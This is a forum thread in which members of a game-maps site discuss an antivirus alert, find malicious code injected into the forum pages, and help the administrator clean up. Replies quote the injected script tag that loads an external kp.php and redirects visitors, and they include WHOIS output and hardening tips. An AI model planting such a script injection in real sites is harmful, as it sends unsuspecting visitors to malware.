VGMaps
November 21, 2017, 02:26:55 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
 
   Home   Help Search Login Register  
Pages: [1] 2 3   Go Down
  Print  
Author Topic: My anti virus program keeps saying there's a virus here.  (Read 17139 times)
0 Members and 1 Guest are viewing this topic.
Wario Bros
Jr. Member
**
Offline Offline

Posts: 51



« on: May 02, 2010, 10:37:17 AM »

When on get on this forums, my anti virus program keeps making a pop-up saying there is a virus threat called "HTML/ScrInject.B.Gen virus."  I tell it to delete it but when I click on another section of the forums, that same warning message comes up.  Is this just me or is it happening to someone else as well?
« Last Edit: May 02, 2010, 02:42:20 PM by Wario Bros » Logged

bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #1 on: May 02, 2010, 10:49:13 AM »

What page is doing this?
Logged
marioman
Hero Member
*****
Offline Offline

Posts: 649


« Reply #2 on: May 02, 2010, 10:51:50 AM »

All of them.  I just sent you a PM about this.
Logged
Revned
Hero Member
*****
Offline Offline

Posts: 1091



« Reply #3 on: May 02, 2010, 10:59:59 AM »

Hmm. At the very end of every page, after the </html> tag, is the following:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

which redirects to http://www3.workfree36-td.xorg.pl based on your cookies. This domain times out on me, so I can't tell what it is.

EDIT: The kdjkfjskdfjlskdjf.com site is timing out for me now, so every page on the forums tries to load forever.
« Last Edit: May 02, 2010, 11:02:29 AM by Revned » Logged

bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #4 on: May 02, 2010, 11:09:25 AM »

Either my AntiVirus is disabling it or IE8 is. I am not having any issues with the site, but I do see the code. Working on it now. Seems like it is embeded in the code.
Logged
Revned
Hero Member
*****
Offline Offline

Posts: 1091



« Reply #5 on: May 02, 2010, 11:20:23 AM »

The script only does something the first time you view it. It adds a cookie, then sends you to the other site. From then on it sees that you have a cookie already and does nothing

The real question is how this is happening in the first place. It's not being appended with JavaScript, because it's there even if I get the page with plain old wget. This sounds almost like they somehow edited the site's PHP source :-S


EDIT: Alright, everyone is safe. The site it redirects you to further redirects you to "QoogleSearch.com", which has been de-listed:

   Domain Name: QOOGLESEARCH.COM
   Registrar: GODADDY.COM, INC.
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
   Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
   Status: ok
   Updated Date: 27-apr-2010
   Creation Date: 21-jan-2010
   Expiration Date: 21-jan-2011
« Last Edit: May 02, 2010, 11:24:06 AM by Revned » Logged

Peardian
Hero Member
*****
Offline Offline

Posts: 627


Busy busy


« Reply #6 on: May 02, 2010, 01:11:06 PM »

That's the infection I was talking about. And it looks like the script is still there at the bottom of the page. The site gives you a virus, or it did before it was shut down.
Logged

MM (10%) - SMA3 (33%) - DNS (0%)

Come check out the Nintendo 64 Mapping Workshop!
bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #7 on: May 02, 2010, 01:15:03 PM »

I overwrote the source code with the original files, hence the current lack of ads at the footer. No luck in removing it though. Currently creating a new directory with a completely fresh install, importing the DB now.

EDIT: Ok, everything is switched over to a completely fresh install with the old DB imported in. Anyone see anything off? Let me know.
« Last Edit: May 02, 2010, 02:18:54 PM by bustin98 » Logged
Wario Bros
Jr. Member
**
Offline Offline

Posts: 51



« Reply #8 on: May 02, 2010, 02:30:36 PM »

That's good to hear!  BTW, I no longer get that virus message anymore.  I'm kinda surprised how fast this was handled.  Smiley
Logged

Revned
Hero Member
*****
Offline Offline

Posts: 1091



« Reply #9 on: May 02, 2010, 02:36:35 PM »

Did you save the infected files for further inspection? This might just happen again if you don't find the cause.
Logged

bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #10 on: May 02, 2010, 02:38:12 PM »

Doesn't seem fast to me... 4 hours of trying stuff just to let it come down to a fresh install. Still will be looking at the old files to see if I can't find what was changed in case it happens again.

EDIT: We are thinking the same.
Logged
Maxim
Hero Member
*****
Offline Offline

Posts: 972



« Reply #11 on: May 03, 2010, 12:34:48 AM »

If you have any files or directories that are world-writeable then other people on your shared server can drop files or add exploits. Also, any vulnerabilities in the forum will get you targeted, the best mitigation being to make some non-standard modifications (e.g. moving form fields around, hiding the version number) to make it harder to script and/or Google for.

(I've had to deal with these kinds of problems for a while... the only real solution is to run custom software, on a private server, and either not be big enough to get targeted or have really robust software. Also, daily backups of the files and DB.)
Logged
Maxim
Hero Member
*****
Offline Offline

Posts: 972



« Reply #12 on: May 03, 2010, 12:38:17 AM »

Also, some of the attachments/avatars have been corrupted. My avatar has had two bytes removed, for example.
Logged
bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #13 on: May 03, 2010, 09:50:31 AM »

Sorry Maxim. It doesn't look like I can do anything about the avatars. You'll have to reload it back up.
Logged
Revned
Hero Member
*****
Offline Offline

Posts: 1091



« Reply #14 on: May 03, 2010, 10:43:46 AM »

Not that avatars are a chief concern, but don't you have backups? My avatar and several others' have disappeared, and it makes me concerned that other things might be corrupted.
Logged

Pages: [1] 2 3   Go Up
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.20 | SMF © 2013, Simple Machines Valid XHTML 1.0! Valid CSS!